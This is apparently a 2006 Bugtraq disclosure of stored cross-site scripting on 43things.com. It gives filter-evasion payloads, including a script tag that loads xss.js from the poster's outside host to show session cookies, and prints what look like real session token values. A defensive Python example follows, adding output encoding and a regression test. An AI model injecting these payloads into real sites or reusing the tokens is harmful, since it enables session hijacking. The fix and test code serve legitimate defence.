Date: 14 Jun 2006 08:51:14 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: 43things.com - XSS with cookie disclosure


43things.com

Homepage:
http://www.43things.com

Affected files:
input box "I want to add to my list"
posting a comment

----------------------------------------

XSS vuln via input text of the box "I want to____"

When you add an item that's already on your list.

For a PoC we have style tags with broken up JavaScript. Put this item in your list once, and then, using the "I want to:" box, put it again:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

Screenshots:
http://www.youfucktard.com/xsp/43things1.jpg


Now, in the same box, even with no filter evasion, we can show our cookie. Try putting:

<script src=http://www.youfucktard.com/xss.js></script>

And then, once again, like above, try putting it again in the same box.

Our cookie:

"This is remote text via xss.js located at youfucktard.com auth=7k5BtRfaYdbOdaaD%2BrHb8JGnJkroqKA2fR2Txs%2BO8BpvcxoRbeAe%2Bp3JZs2fhO7wu4IpF6ofcq1dROtVuHwTiQFkMV3U7pl%2FmcmA4ICJmLk%3D; ubid=4G%2BZUgL4cQNV0JT1ixHx5obNSs0%3D; _session_id=837ecebc52b1d47edd9c65e29a945de8; AWSUSER_ID=awsuser_id1150241074938r6320; AWSSESSION_ID=awssession_id1150241074938r6320"

Screenshots:
http://www.youfucktard.com/xsp/43things2.jpg

--------------------------------------

XSS via posting a comment.

Data here isn't properly sanitized before being generated. We see that even with no filtering we can insert something like:
<IMG SRC=javascript:alert('XSS')>

and it will create our XSS example.

Screenshot 3:
http://www.youfucktard.com/xsp/43things3.jpg

However, it won't actually insert the comment, it will just execute it. So to bypass the "malformed html found" error message, we will use the entity references for <> which are &lt; and &gt;, along with double beginning and ending tags. For a PoC try putting the code below as a comment:

&lt;<<IMG SRC=javascript:alert('We%20Bypassed%20the%20filter!')>>&gt;

Screenshots:
http://www.youfucktard.com/xsp/43things4.jpg

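Both sinks in this post share one root cause: user text is written into the page as markup, and a denylist check ("malformed html found") is relied on to catch tags. The added example below is not from the post or from 43things; it shows the fix a defender would apply, encoding at the point of output, and a regression check that parses the rendered fragment to confirm no user-supplied element survives. The four payloads are the ones quoted above; the function names, the `<p class="comment">` template and the HTMLParser-based check are assumptions for illustration.

```python
# Added example, not code from the original post: output encoding as the fix
# for the stored XSS described above, plus a parser-based regression check.
import html
from html.parser import HTMLParser

# The payloads quoted in the advisory, reused here as test input.
PAYLOADS = [
    r'''<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>''',
    "<script src=http://www.youfucktard.com/xss.js></script>",
    "<IMG SRC=javascript:alert('XSS')>",
    "&lt;<<IMG SRC=javascript:alert('We%20Bypassed%20the%20filter!')>>&gt;",
]

# Hypothetical template wrapping a comment (assumption, not the site's markup).
OPEN, CLOSE = '<p class="comment">', "</p>"


def render_comment(user_text: str) -> str:
    """Return the HTML fragment for one user comment.

    The only defence is encoding at output: every '<', '>', '&' and quote
    becomes an entity, so the browser never sees a tag, whatever was typed.
    A pre-encoded '&lt;' in the input becomes '&amp;lt;' and is shown
    literally, which is why the double-encoding trick above does not apply.
    """
    return OPEN + html.escape(user_text, quote=True) + CLOSE


class _TagCollector(HTMLParser):
    """Collect every element start tag a browser would see in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def user_supplied_tags(fragment: str, own_tags=("p",)) -> list[str]:
    """Parse a rendered fragment; return tags that are not part of the template.

    Intended as a regression test: the list must be empty for every payload.
    """
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return [t for t in collector.tags if t not in own_tags]


def rendered_as_text(fragment: str) -> str:
    """What the reader sees: the escaped body decoded back to plain characters."""
    inner = fragment[len(OPEN):-len(CLOSE)]
    return html.unescape(inner)


if __name__ == "__main__":
    for p in PAYLOADS:
        unsafe = OPEN + p + CLOSE          # raw interpolation, as the post describes
        safe = render_comment(p)
        print("raw   :", user_supplied_tags(unsafe))
        print("escaped:", user_supplied_tags(safe), "->", rendered_as_text(safe))
```

The `rendered_as_text` round trip shows that escaping loses nothing the user typed; it only changes how the browser interprets it. For the cookie disclosure in the second section, output encoding removes the injection, and marking the session cookies `HttpOnly` additionally keeps `document.cookie` from exposing them to any script that does run.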
